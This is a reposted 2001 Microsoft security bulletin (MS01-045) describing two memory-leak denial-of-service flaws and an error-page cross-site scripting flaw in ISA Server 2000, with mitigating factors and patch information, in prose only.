Computer Security
[EN] securityvulns.ru no-pyccku


Related information

  DoS и crossite в MS ISA (DoS, crossite scripting)

From:MICROSOFT <secure_(at)_microsoft.com>
Date:17.08.2001
Subject:Security Bulletin MS01-045

- ----------------------------------------------------------------------
Title:      ISA Server H.323 Gatekeeper Service Contains Memory Leak
Date:       16 August 2001
Software:   ISA Server 2000
Impact:     Denial of service, cross-site scripting
Bulletin:   MS01-045

Microsoft encourages customers to review the Security Bulletin at:
http://www.microsoft.com/technet/security/bulletin/MS01-045.asp.
- ----------------------------------------------------------------------

Issue:
======
This bulletin discusses three security vulnerabilities that are
unrelated except in the sense that both affect ISA Server 2000:

- A denial of service vulnerability involving the H.323 Gatekeeper
  Service, a service that supports the transmission of voice-over-IP
  traffic through the firewall. The service contains a memory leak
  that is triggered by a particular type of malformed H.323 data.
  Each time such data is received, the memory available on the
  server is depleted by a small amount; if an attacker repeatedly
  sent such data, the performance of the server could deteriorate to
  the point where it would effectively disrupt all communications
  across the firewall. A server administrator could restore normal
  service by cycling the H.323 service.
- A denial of service vulnerability in the in the Proxy service.
  Like the vulnerability above, this one is caused by a memory leak,
  and could be used to degrade the performance of the server to
  the point where is disrupted communcations.
- A cross-site scripting vulnerability affecting the error page
  that ISA Server 2000 generates in response to a failed request
  for a web page. An attacker could exploit the vulnerability by
  tricking a user into submitting to ISA Server 2000 an URL that
  has the following characteristics: (a) it references a valid
  web site; (b)it requests a page within that site that can't be
  retrieved - that is, a non-existent page or one that generates
  an error; and (c) it contains script within the URL. The error
  page generated by ISA Server 2000 would contain the embedded
  script commands, which would execute when the page was displayed
  in the user's browser. The script would run in the security domain
  of the web site referenced in the URL, and would be able to access
  any cookies that site has written to the user's machine.

Mitigating Factors:
====================
H.323 Denial of service vulnerability:
- The vulnerability could only be exploited if the H.323 Gatekeeper
  Service was installed. It is only installed by default if "Full
  Installation" is chosen; if "Typical Installation" is selected,
  it is not installed.
- The vulnerability would not enable an attacker to gain any
  privileges on an affected server or add any traffic to an existing
  voice-over-IP session. It is strictly a denial of service
  vulnerability.

Proxy Service Denial of service vulnerability:
- The vulnerability could only be exploited by an internal user; it
  could not be exploited by an Internet user.
- The vulnerability would not enable an attacker to gain any
  privileges on an affected server or compromise any cached content
  on the server. It is strictly a denial of service vulnerability.

Cross-site scripting vulnerability:
- In order to run script in the security domain of a trusted site,
  the attacker would need to know which sites, if any, a user
  trusted. Most users use the default security settings for all web
  sites, which would effectively deny an attacker any gain in
  exploiting the vulnerability for the purposes of running script.
- An attacker who wished to read other sites' cookies on a user's
  machine would have no way to know which sites had placed cookies
  there. The attacker would need to exploit the vulnerability once
  for every web site whose cookies she wished to access.
- Even if the attacker correctly guessed which sites had placed
  cookies on a user's machine, there should be no sensitive
  information in the cookies, if best practices have been followed.

Patch Availability:
===================
- A patch is available to fix this vulnerability. Please read the
  Security Bulletin
  http://www.microsoft.com/technet/security/bulletin/ms01-045.asp
  for information on obtaining this patch.

Acknowledgment:
===============
- Peter Grundl for reporting the memory leaks in the H.323
  Gatekeeper Service and the Proxy Service.
- Dr. Hiromitsu Takagi for reporting the cross-site scripting
  vulnerability.

- ---------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED
"AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL
WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT
SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY
DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,
CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF
MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION
OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO
THE FOREGOING LIMITATION MAY NOT APPLY.

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod